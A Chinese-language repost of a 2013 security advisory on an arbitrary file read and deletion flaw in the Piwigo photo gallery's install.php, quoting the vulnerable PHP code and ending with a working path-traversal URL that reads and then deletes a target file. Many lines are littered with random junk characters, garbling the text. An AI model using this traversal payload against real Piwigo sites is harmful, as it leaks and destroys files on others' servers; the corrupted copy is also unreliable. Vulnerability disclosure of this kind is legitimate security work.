Piwigo任意文件泄露和任意文件删除漏洞

admin

Piwigo是用PHP编写的相册脚本。

Piwigo 2.4.6及其他版本没有正确验证install.php脚本的 'dl'参数值，在实现上存在安全漏洞，攻击者可利用这些漏洞查看受影响计算机上的任意文件，删除受影响应用上下文内的任意文件。
5 c6 y& u8 |% o/ r6 A. N! }6 @====================================================================
6 M. Q3 ~: A: m" P/install.php:
-------------
113: if (!empty($_GET['dl']) && file_exists(PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl']))
114: {
115:   $filename = PHPWG_ROOT_PATH.$conf['data_location'].'pwg_'.$_GET['dl'];
! Z& @$ W# W  v; |. J3 o116:   header('Cache-Control: no-cache, must-revalidate');
) `2 t0 H) v% g$ B8 |117:   header('Pragma: no-cache');
118:   header('Content-Disposition: attachment; filename="database.inc.php"');
119:   header('Content-Transfer-Encoding: binary');
- H/ I& U- Q- s0 n# n8 G120:   header('Content-Length: '.filesize($filename));
; w4 D/ L3 y3 X- L5 f' ^121:   echo file_get_contents($filename);
122:   unlink($filename);
. @5 ?8 @$ x+ _, @5 K: I123:   exit();
124: }
  ]4 e! z9 I  Y+ Y( }4 W: S====================================================================

% ?% ?, v1 k6 v: A# x5 NTested on: Microsoft Windows 7 Ultimate SP1 (EN)
3 w- t5 l/ Y; _: y           Apache 2.4.2 (Win32)
           PHP 5.4.4
           MySQL 5.5.25a
# @6 [/ S' w2 b; M
* \6 r1 ?% t7 H5 UVulnerability discovered by Gjoko 'LiquidWorm' Krstic
& a# T5 x- n3 Z' y3 x* ~                            @zeroscience
* E5 Q2 O/ h/ L2 U
* q7 ~* H+ ]5 w& h! L. {$ HAdvisory ID: ZSL-2013-5127
- Q% F5 D! B: VAdvisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5127.php
1 P% m* a, z6 w+ _6 u# T& ?Vendor Patch: http://piwigo.org/bugs/view.php?id=2843

' e( s* k: r8 Z: j. q: C15.02.2013
2 l, A; g( Q( {9 W2 b
0 ^. L5 B' D5 l' w$ `8 u' W  ~--
/ i, O7 _, Z3 o7 lhttp://localhost/piwigo/install.php?dl=../../../../../../lio_passwords.txt
5 U$ a, Y/ G8 T2 H2 q& }  Y
& E7 s4 F' V4 M2 z5 \  F" |